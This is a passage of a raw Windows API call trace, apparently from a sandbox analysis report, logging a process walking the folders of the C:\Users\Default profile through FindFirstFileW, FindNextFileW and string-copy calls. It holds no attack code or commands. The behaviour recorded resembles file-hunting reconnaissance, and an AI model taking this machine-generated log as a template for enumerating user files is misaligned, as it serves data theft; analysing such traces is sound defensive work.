ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0128.959] StrCmpW (psz1="Roaming", psz2=".") returned 1 [0128.959] StrCmpW (psz1="Roaming", psz2="..") returned 1 [0128.959] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0128.959] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0128.959] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\", psz2="Roaming", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0128.959] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\Default\\AppData\\Roaming", cchMax=1090 | out: psz1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0128.959] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Roaming", psz2="\\*", cchMax=1090 | out: psz1="C:\\Users\\Default\\AppData\\Roaming\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\*" [0128.959] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0128.959] StrCmpW (psz1=".", psz2=".") returned 0 [0128.959] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.959] StrCmpW (psz1="..", psz2=".") returned 1 [0128.959] StrCmpW (psz1="..", psz2="..") returned 0 [0128.959] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0128.959] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0128.959] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0128.959] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0128.959] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0128.959] GetProcessHeap () returned 0xe30000 [0128.959] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0128.959] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0128.959] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0128.959] GetProcessHeap () returned 0xe30000 [0128.960] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0128.960] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0128.960] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0128.960] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0128.960] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0128.960] StrCmpW (psz1="Cookies", psz2=".") returned 1 [0128.960] StrCmpW (psz1="Cookies", psz2="..") returned 1 [0128.960] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0128.960] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0128.960] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0128.960] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0128.960] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0128.960] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Desktop", cchMax=1058 | out: psz1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0128.960] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\Desktop", cchMax=1074 | out: psz1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0128.960] StrNCatW (in: psz1="C:\\Users\\Default\\Desktop", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Default\\Desktop\\*") returned="C:\\Users\\Default\\Desktop\\*" [0128.960] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0128.960] StrCmpW (psz1=".", psz2=".") returned 0 [0128.960] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.960] StrCmpW (psz1="..", psz2=".") returned 1 [0128.960] StrCmpW (psz1="..", psz2="..") returned 0 [0128.960] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0128.960] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0128.960] GetProcessHeap () returned 0xe30000 [0128.960] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0128.960] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0128.960] StrCmpW (psz1="Documents", psz2=".") returned 1 [0128.960] StrCmpW (psz1="Documents", psz2="..") returned 1 [0128.960] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0128.961] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0128.961] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Documents", cchMax=1058 | out: psz1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0128.961] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\Documents", cchMax=1078 | out: psz1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0128.961] StrNCatW (in: psz1="C:\\Users\\Default\\Documents", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Documents\\*") returned="C:\\Users\\Default\\Documents\\*" [0128.961] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0128.961] StrCmpW (psz1=".", psz2=".") returned 0 [0128.961] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.962] StrCmpW (psz1="..", psz2=".") returned 1 [0128.962] StrCmpW (psz1="..", psz2="..") returned 0 [0128.962] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0129.097] StrCmpW (psz1="My Music", psz2=".") returned 1 [0129.097] StrCmpW (psz1="My Music", psz2="..") returned 1 [0129.097] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0129.097] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0129.097] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0129.097] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0129.097] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0129.097] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0129.097] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0129.097] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.098] GetProcessHeap () returned 0xe30000 [0129.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.098] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0129.098] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0129.098] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0129.098] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0129.098] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0129.098] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Downloads", cchMax=1058 | out: psz1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0129.098] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\Downloads", cchMax=1078 | out: psz1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0129.098] StrNCatW (in: psz1="C:\\Users\\Default\\Downloads", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Downloads\\*") returned="C:\\Users\\Default\\Downloads\\*" [0129.098] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.099] StrCmpW (psz1=".", psz2=".") returned 0 [0129.099] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.099] StrCmpW (psz1="..", psz2=".") returned 1 [0129.099] StrCmpW (psz1="..", psz2="..") returned 0 [0129.099] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0129.099] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.099] GetProcessHeap () returned 0xe30000 [0129.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.099] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0129.099] StrCmpW (psz1="Favorites", psz2=".") returned 1 [0129.099] StrCmpW (psz1="Favorites", psz2="..") returned 1 [0129.099] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0129.099] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0129.099] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Favorites", cchMax=1058 | out: psz1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0129.099] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\Favorites", cchMax=1078 | out: psz1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0129.099] StrNCatW (in: psz1="C:\\Users\\Default\\Favorites", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Favorites\\*") returned="C:\\Users\\Default\\Favorites\\*" [0129.099] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.099] StrCmpW (psz1=".", psz2=".") returned 0 [0129.099] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.099] StrCmpW (psz1="..", psz2=".") returned 1 [0129.099] StrCmpW (psz1="..", psz2="..") returned 0 [0129.099] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0129.099] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.099] GetProcessHeap () returned 0xe30000 [0129.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.100] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0129.100] StrCmpW (psz1="Links", psz2=".") returned 1 [0129.100] StrCmpW (psz1="Links", psz2="..") returned 1 [0129.100] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0129.100] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0129.100] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Links", cchMax=1058 | out: psz1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0129.100] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\Links", cchMax=1070 | out: psz1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0129.100] StrNCatW (in: psz1="C:\\Users\\Default\\Links", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Default\\Links\\*") returned="C:\\Users\\Default\\Links\\*" [0129.100] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.100] StrCmpW (psz1=".", psz2=".") returned 0 [0129.100] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.100] StrCmpW (psz1="..", psz2=".") returned 1 [0129.100] StrCmpW (psz1="..", psz2="..") returned 0 [0129.100] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0129.100] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.100] GetProcessHeap () returned 0xe30000 [0129.100] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.100] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, 